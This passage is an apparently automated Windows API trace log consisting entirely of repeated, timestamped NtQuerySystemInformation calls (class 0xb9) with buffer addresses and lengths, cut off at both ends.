(SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x28, ResultLength=0x0) [0226.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x28, ResultLength=0x0) [0226.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x28, ResultLength=0x0) [0226.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0f0, Length=0x28, ResultLength=0x0) [0226.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x38, ResultLength=0x0) [0226.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x38, ResultLength=0x0) [0226.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x28, ResultLength=0x0) [0226.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x28, ResultLength=0x0) [0226.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x38, ResultLength=0x0) [0226.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x38, ResultLength=0x0) [0226.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfe0, Length=0x20, ResultLength=0x0) [0226.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0226.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0226.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0226.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x20, ResultLength=0x0) [0226.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x38, ResultLength=0x0) [0226.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x20, ResultLength=0x0) [0226.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x20, ResultLength=0x0) [0226.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x20, ResultLength=0x0) [0226.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x20, ResultLength=0x0) [0226.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x38, ResultLength=0x0) [0226.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x20, ResultLength=0x0) [0226.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x20, ResultLength=0x0) [0226.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x20, ResultLength=0x0) [0226.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x20, ResultLength=0x0) [0226.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x38, ResultLength=0x0) [0226.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x20, ResultLength=0x0) [0226.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x20, ResultLength=0x0) [0226.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x20, ResultLength=0x0) [0226.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd368, Length=0x58, ResultLength=0x0) [0226.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x58, ResultLength=0x0) [0226.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x38, ResultLength=0x0) [0226.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0226.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0226.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0226.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0226.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x28, ResultLength=0x0) [0226.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x38, ResultLength=0x0) [0226.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x28, ResultLength=0x0) [0226.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x28, ResultLength=0x0) [0226.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x38, ResultLength=0x0) [0226.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfd0, Length=0x20, ResultLength=0x0) [0226.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x20, ResultLength=0x0) [0226.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x20, ResultLength=0x0) [0226.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x20, ResultLength=0x0) [0226.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x38, ResultLength=0x0) [0226.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfd0, Length=0x20, ResultLength=0x0) [0226.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0226.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0226.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x58, ResultLength=0x0) [0226.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x38, ResultLength=0x0) [0226.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0226.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0226.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0226.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0226.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x28, ResultLength=0x0) [0226.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x38, ResultLength=0x0) [0226.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x28, ResultLength=0x0) [0226.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x28, ResultLength=0x0) [0226.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf10, Length=0x20, ResultLength=0x0) [0226.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce90, Length=0x20, ResultLength=0x0) [0226.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce90, Length=0x20, ResultLength=0x0) [0226.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce90, Length=0x20, ResultLength=0x0) [0226.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x38, ResultLength=0x0) [0226.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x38, ResultLength=0x0) [0226.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfd0, Length=0x20, ResultLength=0x0) [0226.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0226.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0226.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x58, ResultLength=0x0) [0226.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x38, ResultLength=0x0) [0226.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0226.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0226.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0226.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0226.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x28, ResultLength=0x0) [0226.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x38, ResultLength=0x0) [0226.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x28, ResultLength=0x0) [0226.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x28, ResultLength=0x0) [0226.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x38, ResultLength=0x0) [0226.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfd0, Length=0x20, ResultLength=0x0) [0226.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x20, ResultLength=0x0) [0226.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x20, ResultLength=0x0) [0226.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x20, ResultLength=0x0) [0226.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x38, ResultLength=0x0) [0226.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfd0, Length=0x20, ResultLength=0x0) [0226.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0226.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0226.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x58, ResultLength=0x0) [0226.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x38, 